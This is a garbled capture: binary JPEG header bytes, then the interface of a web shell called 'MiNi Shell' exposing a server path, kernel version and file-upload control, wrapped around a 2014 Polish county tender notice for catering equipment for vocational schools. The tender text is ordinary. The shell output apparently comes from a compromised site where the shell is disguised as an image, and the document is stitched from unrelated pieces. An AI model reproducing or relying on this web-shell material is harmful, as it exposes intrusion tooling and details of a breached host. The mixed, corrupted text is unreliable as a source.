JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140409/121730-N-2014.html

<p class="kh_header"><b>Ożarów Mazowiecki: DOSTAWA WRAZ Z MONTAŻEM WYPOSAŻENIA PRACOWNI GASTRONOMICZNYCH W RAMACH REALIZOWANEGO PRZEZ 
POWIAT WARSZAWSKI ZACHODNI PROJEKTU PN. INWESTYCJA W PRZYSZŁOŚĆ FINANSOWANEGO ZE ŚRODKÓW 
UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI DZIAŁANIE 9.2 - PODNIESIENIE 
ATRAKCYJNOŚCI I JAKOŚCI SZKOLNICTWA ZAWODOWEGO.</b><br>
<b>Numer ogłoszenia: 121730 - 2014; data zamieszczenia: 09.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatu Warszawskiego Zachodniego , ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki, woj. mazowieckie, tel. 022 7337212, faks 022 7337212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA WRAZ Z MONTAŻEM WYPOSAŻENIA PRACOWNI GASTRONOMICZNYCH W RAMACH REALIZOWANEGO PRZEZ 
POWIAT WARSZAWSKI ZACHODNI PROJEKTU PN. INWESTYCJA W PRZYSZŁOŚĆ FINANSOWANEGO ZE ŚRODKÓW 
UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI DZIAŁANIE 9.2 - PODNIESIENIE 
ATRAKCYJNOŚCI I JAKOŚCI SZKOLNICTWA ZAWODOWEGO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZSP nr 1 w Ożarowie Mazowieckiem - dostawa i montaż na adres: 
05-850 Ożarów Mazowiecki, ul. Poznańska 129/131:

1.Piec konwekcyjno-parowy ze sterowaniem cyfrowym 5xGN 1/1 z blachami
Wentylator o zmiennym kierunku obrotów 
system bezpośredniej produkcji pary/
system osuszania komory /
system cyrkulacji powietrza /
Halogenowe oświetlenie
Wyposażenie opcjonalne : Rotor / system myjący /
ilość - 1
2.Meble ze stali nierdzewnej :
A)Szafa porządkowa z umywalką 1000x500x2000 mm.
Komora umywalki zabudowana z trzech stron, otwory wentylacyjne, przestawna półka.
ilość - 1
Stół przyścienny z blokiem trzech szuflad po prawej stronie i drzwiami suwowymi, wykonany z wysokiej jakości stali nierdzewnej AISI 304  przesuwana półka w szafce . Tylne nogi stołów SA przesunięte o 80 mm względem blatu. Głębokość szuflad 150 mm. 
B)3 Stoły o rozmiarach  :
1900x600x850 ilość 1
1700x600x850 ilość 1
150x600x850  ilość 1
3.Szafa chłodnicza - obudowa ze stali nierdzewnej. Elektroniczny sterownik z wyświetlaczem temperatury, automatyczne oszranianie, filtr przeciwpyłowy, grubość ścianki 60 mm. Regulowane nóżki ze stali nierdzewnej. W komplecie 6 półek powlekanych, samo domykające drzwi z zamkiem na klucz, profilowany uchwyt do otwierania drzwi. Komora chłodząca wykonana z aluminium, wymiary półek WxD:530x595 mm. 
ilość - 1
4. Schłodziarka szokowa - urządzenie służące do szybkiego schładzania lub szybkiego zamrażania potraw. Otwór odpływowy na spodzie komory, wbudowany agregat. Cyfrowy panel sterowania, pojemność :
5xGN 1/1 , wsad 12/18 kg.na cykl, schładzanie szokowe+70 o C +3oC w ciągu 90 minut lub w ciągu 240 minut. 
ilość - 1
5.  Lodówka na próbki -opływowy kształt, na drzwiach instrukcja pobierania i przechowywania próbek. Urządzenie wykonane z blachy malowanej proszkowo /białe/, drzwi perłowe. Cichy agregat. 
ilość - 1
6. Zestaw sztućców specjalistycznych wykonanych ze stali nierdzewnej .
1)widelec do ryb -12
2)nóż do ryb - 12
3)nóż do serwowania ryb -1
4)nóż do tortu -1
5)nóż do steków -1
6)widelec do sałaty -1
7)łyżka do serwowania -1
8)chochelka -1
9)łyżeczka do cukru -6
10)łyżka stołowa 12
11)łyżeczka do kawy - 12
12)widelec stołowy -12
13)nóż stołowy - 12
14)łyżeczka do herbaty -12
15)łopatka do ciast -1 
16)łyżeczka barmańska -1
17)łyżeczka do deserów - 12
18)widelczyk stołowy - 2
19)widelec do sałatek - 1
20)łopatka do pizzy - 1
21)łyżka perforowana - 1
22)radełko do pizzy - 1
23)szczypce do spaghetti - 1
24)łopatka do serwowania - 1
25)ubijak do ziemniaków - 1
26)łopatka do przewracania perforowana - 1
27)chochla do serwowania / łyżka cedzakowa - 1
28)widelec do przewracania - 1 
29)szczypce - 1 
30)skrobarka do ryb - 1 
31)pęseta do usuwania ości - 1
32)nóż do pieczeni - 1
33)nóż do oddzielania kości wąski - 1 
34)stalka - 1
35)nóż do jarzyn - 1 
36)nóż uniwersalny - 1
37)nóż do wędlin - 1
38)nóż do serów - 1
39)nóż do obierania - 6
40)nożyce kuchenne - 1 
41)nożyce do drobiu - 1
7. Kuchnie indukcyjne - wykonane ze stali nierdzewnej , do 60% ogranicza zużycie energii w stosunku do tradycyjnych urządzeń grzewczych, bezpieczny system grzewczy ,płaska i gładka powierzchnia. 
Trzony indukcyjne włączają się w chwili postawienia naczynia i wyłączają w momencie zdjęcia naczynia. 
Klasa energetyczna: A+
4 pola indukcyjne. 
ilość - 4
8. Kuchnie mikrofalowe wykonane ze stali nierdzewnej
 o mocy 1000 W, pojemność komory 25 litrów, elektroniczne sterowanie, zakres zegara 1h40 min. 3 zakresy mocy wymiary wewnętrzne komory: 370x370x190 mm.
ilość - 2
9. Grill podwójny : stalowa płyta grillowa o grubości 12 mm.2strefy grzewcze, płynna regulacja temperatury, specjalna szufladka na tłuszcz, obudowa ze stali nierdzewnej, powierzchnia robocza WxD 600x350 mm. 
ilość - 1
10. Piec do pizzy  : obudowa wykonana ze stali nierdzewnej, płyty szamotowe o grubości 20 mm. Zakres pracy do 450o C, oświetlenie komory, kominek odprowadzający parę, możliwość niezależnego sterowania grzałką górną oraz dolną. ilość 1
11. Zmywarka gastronomiczna do naczyń :
Urządzenie wykonane ze stali nierdzewnej , 2 pary ramion myjąco-płuczących - góra/dół, pojemność komory - 26 l. pojemność bojlera - 5,5 l, maksymalna wysokość wsadu 315 , kosz 500x500, kosz do talerzy uniwersalny i pojemnik na sztućce  w standardzie, dozownik do płynu w standardzie, spełnia wymagania technologiczne konieczne przy wdrażaniu systemu HACCP, użycie wody 2,5l/cykl.
ilość - 1
12. Lodówka z kostkarką obudowa ze stali nierdzewnej, dane techniczne: wymiary: 178,9x91,2x73,4, klasa energetyczna A
Pojemność użytkowa zamrażarki 144 l
Pojemność użytkowa chłodziarki 357 l , pojemność użytkowa zamrażarki 144 litry.
ilość - 1
13. Ekspres do kawy - ciśnieniowy  obudowa ze stali nierdzewnej z elementami  z tworzywa 
4 programowalne przyciski do wydawania kawy, przyłącze wodne 3/8, wydajna pompa rotacyjna, pojemność bojlera - 6, moc grzałki bojlera - 2000 W.
ilość - 1
14. Roboty uniwersalne  wielofunkcyjny:  (typu R301) z  zestawem tarcz 
Pojemnik cutter i szatkownica wykonane z wytrzymałego tworzywa. Wyposażony w system sterowania impulsywnego.
ilość - 2
15. Maszyna do ubijania masy - Mieszarka do ubijania masy
Pojemność zbiornika 12 l.
Wymiary 333x42mm.
ilość - 2
16. Wilk gastronomiczny  -  pokrywa z poliwęglanu
Wał silnika ze stali nierdzewnej spełnia wymogi HACCP.
ilość - 1
17. Krajalnica specjalistyczna specjalny nóż do serów pokryty teflonem
Podstawa wykonana z lakierowanego  aluminium, osłona noża, taca  podawcza oraz ruchoma ścianka wykonane są z anodowanego aluminium, wentylowany silnik, ostrzałka.
ilość - 1
18. Rozdrabniacz - tarcza rozdrabniająca wykonana ze stali nierdzewnej
Auto-rewers wpływający na bezawaryjną pracę młynka, zestaw montażowy  Quick-Lock gwarantujący szybką instalację. Zabezpieczenie przed przeciążeniem, ręczne resetowanie. Pojemność komory mielenia od 1 do 1,7 litra, wbudowany włącznik  pneumatyczny.
ilość - 1
19. Naświetlacz do jaj szufladowy - dezynfekuje jednorazowo 30 szt. Jaj. Dezynfekcje zapewniają lampy emitujące dawkę promieniowania UV . czas naświetlania 150 sek. Obudowa ze stali nierdzewnej.
ilość - 3
20. Waga elektroniczna -kalkulacyjna : zasilanie sieciowo-akumulatorowe z automatycznym wyłącznikiem, akumulator 6V3,6 Ah zasilacz sieciowy 230 V 8 klawiszy kodów bezpośrednich, klawiatura pokryta gumą silikonową, konwersja walut na euro ,dwie szalki-plastikowa i stalowa, port RS232 do współpracy z kasami lub komputerem. Wymiary szalki  WxD;304x220 mm. Zakres ważenia do 15 kg. Dokładność 0,005 kg.
ilość - 2
21. Waga sklepowa :pojedynczy wyświetlacz ciekłokrystaliczny , szalka ze stali nierdzewnej, wielokrotne tarowanie, zasilanie bateryjne lub z zasilacza sieciowego. Duży wyświetlacz , dwuzakresowa . Wymiary szalki WxD; 230x190 mm. Zakres ważenia  do 30 kg.
ilość - 1
22. Waga magazynowa : zasilanie sieciowe lub akumulatorowe - akumulator 6V 3,3 Ah, zasilacz sieciowy - 230V, ruchomy wyświetlacz, wodoodporna klawiatura, konstrukcja odporna na wstrząsy, wibracje i przeciążenia. Wymiary platformy WxD do 60 kg.
ilość - 1
23. Ekspres  ciśnieniowy z młynkiem - automatyczne spienienie mleka. Obudowa stalowa. Pojemność 1,8 l, moc 1450 W, ciśnienie 15 bar.
ilość - 1
24. Wkłady do pieca  konwekcyjnego
O rozmiarach dł. 530 mm szer. 360 mm. GN ze stali nierdzewnej 1/1 
Wysokość: 
1)h 20 - 1
2)h 40 - 1
3)h 65 - 1
4)h 100 -1
25. Kostkarka do lodu - obudowa ze stali nierdzewnej, posiada zasobnik na lód, izolowane ścianki, odpływ grawitacyjny. Wymagane podłączenie do wody i odpływu.
ilość - 1
26. Akcesoria cukiernicze i formy do wypieków : 
1)końcówka do nadziewania - 1
2)komplet końcówek dekoracyjnych - 1 
3)skrobki plastikowe - 1 
4)worek do wyciskania standard - 1 
5)szczotka do czyszczenia końcówek - 1
6)Mata do wypieków - wykonana z silikonu, odporność termiczna 
  40 do 250 o C - 1
7)Forma piramida - 1
8)Forma broszka - 1
9)Forma babka - 1
10)Komplet wybieraków do ciasta - 1

27. Gofrownica: żeliwne płyty grzewcze, regulacja temperatury do 300 o C, wyjmowana rynienka. Wzór gofrów  kwadraty 4x6, czas pieczenia  2-3 minuty po nagrzaniu urządzenia.
ilość - 1
28. Czekoladziarka 
Pojemność 3 l. 
Korpus srebrny
Wymiary 260x320x495mm
Pojemność: 3l
Waga : 7 kg
ilość - 1
29. Wyciskarka do owoców cytrusowych - obudowa wykonana z polerowanego stopu aluminium, pojemnik, docisk i wyciskacz ze stali nierdzewnej, maksymalna  średnica owoców 120 mm. 
Urządzenie uruchamiane za pomocą dźwigni dociskacza.
ilość - 1
30. Zestaw narzędzi  barmańskich : 
1) SHAKER do koktajli 3 częściowy wykonany ze stali nierdzewnej,  elektryczny wyciskacz do cytrusów : 2 wymienne końcówki wyciskające, podstawa anodowanego aluminium, misa i sitko wykonane z poliwęglanu, transparentna pokrywa misy, prędkość 900 obr/ min.
ilość - 1
2) Blender Bar : 2 prędkości 17000/21000 obr./ min, pojemnik 1,25 litra akrylowy w komplecie sitko barmańskie.
ilość - 1
31. Piec segmentowy-elektryczny z termo obiegiem 2 komorowy (typu: KROMET z BLACHAMI GN 2/1 lub równoważne)
Moc całkowita : 14 kw.
Wymiary komory : 530x650x340mm
Zasilanie : 3NPE 230/400V 50HZ.
ilość - 1
32. Maszyna  do bitej śmietany - wyjmowany pojemnik, możliwość regulowania termostatycznie  temperatury w zakresie od 2-6oC. Wszystkie elementy ze stali nierdzewnej. Regulacja napowietrzania śmietany wg potrzeb. Pompa /konstrukcja łopatkowa/ uruchamiana przez przycisk. Wbudowany agregat chłodniczy.
ilość - 1
33. Lada ekspozycyjna przeznaczona do prezentacji przechowywanej żywności. Wykonana ze stali nierdzewnej o wymiarach 380x670x735.
ilość - 1
34. Gofrownica - obudowa wykonana ze stali nierdzewnej, dwie płyty żeliwne, płynna regulacja temperatury.
ilość - 1

SOSW w Lesznie -  - dostawa i montaż na adres: 
05-084 Leszno, ul. Sochaczewska 4

35. Kuchnia gazowo - elektryczna:
Miejsca grzejne: 4 palniki
Płyta grzejna: gazowa;
Piekarnik: elektryczny;
Zapalarka: Tak, w pokrętle
Pojemność piekarnika: 53,4 l
Klasa energetyczna: A
Wymiary (WxSxG): 91 cm x 60 cm x 60 cm
Kolor: stalowy
Czujnik zapobiegający ulatnianiu się gazu
ilość - 1
36. Lampa owadobójcza:
Dopuszczona do użytku w kuchni;
Metalowa obudowa z możliwością zamocowania na ścianie
Dwie świetlówki 15W, żywotność 8000-10000 godzin
Taśma klejąca do łapania owadów;
Min. Zasięg działania 100 m2
Taśma klejąca w zestawie
ilość - 1
37. Zastawa stołowa:
Kolor biały
Min. 26 elementów, w tym: 6 talerzy obiadowych, 6 talerzy głębokich, 6 talerzy deserowych, 
2 półmiski owalne, 2 salaterki, sosjerka z podstawką, solniczka, pieprzniczka, Waza
Porcelanowa
Możliwość mycia w zmywarce
ilość - 1
38. Sztućce:
Kolor stalowy
Min. 68 elementów, w tym: 
12 noży obiadowych;
12 widelców obiadowych, 12 łyżek obiadowych,
12 łyżeczek do herbaty;
12 widelczyków do ciasta;
Widelczyk półmiskowy mały/duży;
2 łyżki,
Widelec do sałaty;
Łyżka do sosu;
Łyżka wazowa;
Łyżeczka do cukru;
1 łopatka do cukru
Stal nierdzewna
Możliwość mycia w zmywarce
ilość - 1
39. Szafa magazynowa dwudzielna z drzwiami otwieranymi (skrzydłowymi) wykonana ze stali nierdzewnej chromowo-niklowej jest przeznaczona do przechowywania żywności lub umytych naczyń. Grubość blachy 1 mm. Półki w szafie są zamontowane na stał. Liczba półek 4. Stopki nóżek regulowane w zakresie -1 do +2 cm.
Wymiary (W x D x S): 200 cm x 120-140 cm x 50 cm.
ilość - 1
40. Stół szkieletowy centralny bez półki. Wykonany ze stali nierdzewnej 
gat. AISI 441 lub lepszej. Blat wykonany z blachy o grubości 1,00 mm (wygłuszony i wzmocniony od spodu płytą podwójnie laminowaną). Wyposażony w rant tylny o wysokości 40 mm. Grubość blatu: 40 mm.
Wymiary: 160 cm x 70 cm x 85 cm.
ilość - 1
41. Dodatki kelnerskie - Wyciskarka do cytrusów ręczna (chrom).
ilość - 1
42. Dodatki kelnerskie - Otwieracz do butelek 4 funkcyjny.
ilość - 1
43. Dodatki kelnerskie - Shaker nierdzewny (stal nierdzewna, poj. 600 ml).
ilość - 1
44. Mikser profesjonalny z misą:
Stabilna konstrukcja i zwiększona wytrzymałość;
Cyfrowy timer
3 stopnie prędkości
Prędkość na odpowiednich biegach 132/284/590 obr/min.
Wyjmowana nierdzewna dzieża
Dokładne mieszanie bez rotacji dzieży.
ilość - 1
45. Mikser (blender) ręczny:
W zestawie min 3 końcówki: nóż gwiazdka - przeznaczony do krojenia, siekania i rozcierania warzyw 
i owoców surowych lub gotowanych na puree, owoców zamrożonych na lody lub dżem.
ilość - 1.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
a) zmiany wynagrodzenia Wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa i w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustalonej stawki podatku od towarów i usług VAT,
b) zmiany terminu wykonania zamówienia w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy występujące po podpisaniu umowy, a powodujące niemożność wywiązania się z umowy w jej obecnym brzmieniu,
innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pwz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatu Warszawskiego Zachodniego 
ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2014 godzina 11:00, miejsce: Starostwo Powiatu Warszawskiego Zachodniego 
ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki - Punkt informacyjny (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> REALIZACJA PROJEKTU PN. INWESTYCJA W PRZYSZŁOŚĆ FINANSOWANEGO ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI DZIAŁANIE 9.2 - PODNIESIENIE ATRAKCYJNOŚCI I JAKOŚCI SZKOLNICTWA ZAWODOWEGO..</p>
